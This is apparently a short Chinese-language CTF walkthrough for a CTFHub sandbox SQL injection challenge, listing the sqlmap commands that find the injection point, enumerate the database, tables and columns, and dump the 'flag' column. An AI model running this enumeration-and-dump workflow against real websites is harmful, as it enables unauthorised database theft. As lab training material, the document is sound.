SQLMAP注入
①判断注入点
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1”
发现是一个注入点
②查询数据库
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db
得到当前数据库sqli
③查询数据表(flag与news)
④查询字段
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” --columns
⑤导出数据
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” -C “flag” --dump